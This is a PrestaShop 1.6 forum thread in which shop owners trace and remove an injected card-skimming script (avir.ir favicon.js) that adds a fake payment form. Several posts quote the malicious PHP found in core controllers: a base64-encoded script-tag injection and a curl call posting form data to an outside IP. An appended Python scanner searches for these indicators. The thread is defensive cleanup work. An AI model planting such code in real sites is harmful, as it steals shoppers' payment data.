Joseph Joestar Posted March 22, 2021 (edited)

Hello

In the source code of the order pages of my PrestaShop 1.6 website, I found a script tag that is calling a malicious script:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script>
<!DOCTYPE HTML>
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]-->
<!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]-->
<!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]-->
<!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]-->
<html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman ......

This script changes the DOM and adds an undesirable payment form after the PAYMENT HOOK (I hid this form with CSS to prevent my customers from seeing it and using it).

Is anyone having this same issue? The problem seems pretty complex after 2 days of investigation, searching through all my files and all my DB without finding anything interesting.

Edited March 22, 2021 by Joseph Joestar
Indy80 Posted March 26, 2021

Yep, it happened to me as well a few days ago on PrestaShop 1.6. Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this and remove it:

$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

or at the end:

try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {}

It's an injection but I still don't know where it came from (PrestaShop core breach? module?)... it's really bad anyway.
Joseph Joestar Posted March 26, 2021 (Author)

Some solutions are there. Check out (in French)
YanK1973 Posted April 13, 2021 (edited)

On 3/26/2021 at 4:47 PM, Indy80 said:

Yep, it happened to me as well a few days ago on PrestaShop 1.6. Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this and remove it:

$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

or at the end:

try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {}

It's an injection but I still don't know where it came from (PrestaShop core breach? module?)... it's really bad anyway.

I found and removed those lines exactly where you said. Where can I check and clean the rest of the website? It seems I have more, as I see in tests here https://sitecheck.sucuri.net and here https://scanner.pcrisk.com, and they are all related to "Detected reference to malicious blacklisted domain www.avir.ir".

I also found an infection in AdminLoginController.php as mentioned here, should I delete it?

$ch = curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));

EDIT: My hosting just informed me that the cartabandonmentpro was the reason. I had it installed but never enabled, now deleted of course.

Edited April 13, 2021 by YanK1973
demontage Posted May 4, 2021

Hello, I have the same problem with this favicon.js script. I removed all lines of code from the files mentioned here and even more (I searched for those keywords in all files in the shop). Unfortunately the fake payment form still exists, and this too:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> 😒

Anyone have a clue how to find it?
Prestachamps Posted May 4, 2021

Hi, have you checked if the script was somehow added from the database? Also try disabling overrides and disabling non-PrestaShop modules, as there is a chance that the code is being added from some module if it's not the database. Also, could you send me the URL of your shop in a PM so I can check? Maybe I can give you some clue where to search for it.

Kind regards, Leo
demontage Posted May 4, 2021 (edited)

Hi, I don't know how to check if it's from the DB. I disabled overrides and non-Presta modules and I scanned all the files. Thank YOU! 🙏

Edited May 4, 2021 by demontage
Prestachamps Posted May 4, 2021

Hi, as I see, the script is being added into your footer.tpl, please check your theme's footer.tpl.

Kind regards, Leo
demontage Posted May 4, 2021

32 minutes ago, Prestachamps said:

Hi, as I see, the script is being added into your footer.tpl, please check your theme's footer.tpl.

Kind regards, Leo

The script is probably added dynamically by some other script; there is nothing in the footer.tpl. That was the first place I looked at.
Prestachamps Posted May 6, 2021

Hi, to check if it's from the DB, export a database dump from your cPanel, open the dump in a text editor, and search for "favicon.js" or for "avir.ir".

Kind regards, Leo
SirBob Posted May 11, 2021

I have exactly the same issue on PS 1.6.1.23. I've cleaned the files mentioned in this thread but the offending JS code still appears. I uploaded clean files from the same version of PS. Still the problem exists.

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script>

definitely seems dynamically created / loaded as it does not appear in the theme's header or footer tpl files. I've also looked in other tpl files just in case, but no luck.

Has anyone had success in removing the offending code, and its source to prevent re-infection? If so, how? Please share as it would be really helpful to me, and no doubt others, as this seems to be an exploit being run against PS in particular. I haven't come across similar threads or articles in relation to other e-commerce software.

A scan against a backup of the DB files did not reveal any reference to "avir" or "avir.ir" or the base64_encoded string.

I am desperate for a solution if anyone has further ideas / insights. Many thanks!
SirBob Posted May 11, 2021

Update - I think I may have won this round, so perhaps what follows might help someone else facing a similar issue:

I took the full script tag ==> <script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> and base64_encoded it, which revealed this => PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=

I scanned all files on the server for that string and found one further file which seemed to contain the offensive code in /controllers/front/ParentOrderController.php

Replacing that file with a clean copy seemed to have done the trick.

Hope this helps someone else... Cheers
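The two search techniques in this thread (grepping a DB dump for the plain domain, and grepping the tree for the base64-encoded script tag) can be combined into one scanner that also decodes every base64_decode('...') literal it finds, so injections hidden behind a different encoding of the same tag are caught too. This is an added example, not code from the thread or from PrestaShop; the file layout, file names and the "hello" clean sample are constructed, and the indicators are the ones quoted in the posts above.

```python
import base64
import re
import tempfile
from pathlib import Path
# Indicators quoted in the thread: the injected domain and script name, plus the host the
# decoded base64 strings point to. Extend the tuple for other campaigns.
INDICATORS = ("avir.ir", "favicon.js", "45.197.141.250")
# A literal that decodes to markup or a URL is worth a look even when the host is unknown.
SUSPICIOUS_DECODED = ("<script", "://")
# Matches base64_decode('...') or base64_decode("...") with a literal argument.
B64_CALL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")

def decode_b64_literals(text):
    """Decode the argument of every base64_decode('<literal>') call found in text."""
    decoded = []
    for m in B64_CALL.finditer(text):
        try:  # binascii.Error is a ValueError, so invalid literals are just skipped
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass
    return decoded

def scan_text(text):
    """Return (kind, evidence) pairs: plain indicator hits plus suspicious decoded literals."""
    hits = [("plain", ind) for ind in INDICATORS if ind in text]
    for d in decode_b64_literals(text):
        if any(s in d for s in INDICATORS + SUSPICIOUS_DECODED):
            hits.append(("base64", d))
    return hits

def scan_tree(root, exts=(".php", ".tpl", ".sql")):
    """Walk a shop tree (or a folder holding a DB dump) and map relative path -> hits."""
    root, report = Path(root), {}
    for path in root.rglob("*"):
        if path.suffix in exts and path.is_file():
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample reproducing the injected lines quoted in the thread, and a clean
# file whose base64 literal decodes to "hello" and must not be reported.
SAMPLE_CONTROLLER = ("<?php\n$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');\n"
                     '$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));\n')
CLEAN_PHP = "<?php\n$greeting = base64_decode('aGVsbG8=');\n"
def demo():  # lay the samples out like a PrestaShop 1.6 tree in a temp dir and scan it
    with tempfile.TemporaryDirectory() as d:
        Path(d, "classes", "controller").mkdir(parents=True)
        Path(d, "classes", "controller", "Controller.php").write_text(SAMPLE_CONTROLLER)
        Path(d, "config.php").write_text(CLEAN_PHP)
        return scan_tree(d)
```

Run scan_tree against the shop root and against a directory holding the exported .sql dump; a file only shows up in the report when it carries a plain indicator or a base64 literal that decodes to one (or to a script tag or URL).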
geigerherbert Posted June 22, 2022

Thank you for this very helpful information. I think we have to fix the security gap in the code, not only monitor the changes. Has anybody found the way in, where the malware came in? So we could shut this hole down?

Thank you, Herb
gmanPrestashop Posted July 1, 2022

On 6/22/2022 at 9:40 PM, geigerherbert said:

Thank you for this very helpful information. I think we have to fix the security gap in the code, not only monitor the changes. Has anybody found the way in, where the malware came in? So we could shut this hole down?

Thank you, Herb

Hello, do you have any new information on this? Please let me know if so. Thank you!